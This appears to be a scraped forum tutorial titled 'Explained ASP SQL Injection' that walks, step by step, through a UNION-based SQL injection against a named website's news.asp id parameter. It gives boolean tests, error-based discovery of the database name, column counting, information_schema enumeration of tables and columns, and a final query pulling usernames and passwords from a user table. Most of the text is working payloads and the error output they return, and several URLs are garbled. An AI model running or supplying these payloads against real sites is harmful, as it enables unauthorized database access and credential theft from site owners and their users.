Explained ASP SQL Injection

2023 年 9 月 5 日1350

secure-hiphop鐨勭┖闂

I tested it on http://http://www.zjjv.com///news.asp?id=2

step 2: add after 2 with space; and 1=0 OR and 1=1
so: http://http://www.zjjv.com///news.asp?id=2 and 1=0

By 1=0 you should get an error, or empty page like:

Code:ADODB.Field error 80020009

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/default.asp, line 0


and with 1=1 you need to get a normal page.

step 3: add after the 2 without space (yes remove step 2 text) ;
Code:+union+select+0+from+onzin


then you should get an error like:

Code:Microsoft OLE DB Provider for ODBC Drivers error 80040e37

[MySQL][ODBC 3.51 Driver][mysqld-5.0.24-community-nt]Table ssk2006.onzin doesnt exist

/inc/extra.asp, line 110

step 4: Then the database is:: ssk2006

step 5: (yes, remove everything after 2)
Code:+union+select+0+from+information_schema.tables


OR go ahead until you get an error like:
Code:Type mismatch

So like this:

Code:+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables

Until then you get this error:
Code:The used SELECT statement......

step 6: Now we are almost done!!

step 7: Change from: http://http://www.zjjv.com///news.asp?id=2 to http://..../news.asp?id=-2
(i changed 2 to -2 .. saying this because some dont see it :tongue:)

Then the name of the frame/title must change to a number. (7 here for example)

step 8: Then you make from that number what you see "table_name" (without quotes) instead of 7 and then you get the name: CHARACTERS_SETS.

step 9: then you put behind: (7 is changed by table_name because of that number :pinch: )

Code:+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+

where+table_schema=ssk2006
the frame name changes to a table name like tblUsers.

put +limit+1,1 after the databasename to check inside the tblUsers:
step9:
Code:+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+

where+table_schema=ssk2006+limit+1,1
(ssk2006 is the database again)

Go ahead with counting up:

Code:+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+

where+table_schema=ssk2006+limit+2,1

(or 3,1 of 4,1 ect ect)

until you get something with tblUser or something else with User. (Its still Type mismatch !)

step 10: tblUser is the table of the users!! yeah found

step 11: change

Code:+union+select+0,1,2,3,4,5,6,table_name,8,9,10,11,12+from+information_schema.tables+

where+table_schema=ssk2006+limit+1,1
to:

Code:+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+

table_name=tblUser

Then you get again a number (7 for example, with still Type mismatch!)

step 12: change the number to column_name ; so you get this:
Code:+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+

where+table_name=tblUser
Then you see something like iUserID (or ex. login)

step 13: change

Code:+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+

where+table_name=tblUser
to:

Code:+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+

where+table_name=tblUser+limit+1,1

Write everything down what you get; like;
Code:iUserActive , sUserName,sPassword ect ect

with the method limit 1,1 keep making it higher : 2,1 - 3,1 - 4,1 etc

step 14: change
Code:+union+select+0,1,2,3,4,5,6,column_name,8,9,10,11,12+from+information_schema.columns+

where+table_name=tblUser+limit+4,1

to

Code:+union+select+0,1,2,3,4,5,6,sUserId,8,9,10,11,12+from+tblUser

step 15: Now you have finished SQL injection

Code:sUserName (ex: admin)
sUserEmail (ex: webmaster@site.com)
sUserLogin (ex: administrator)
sUserPassword (ex: donthackme1)

0 0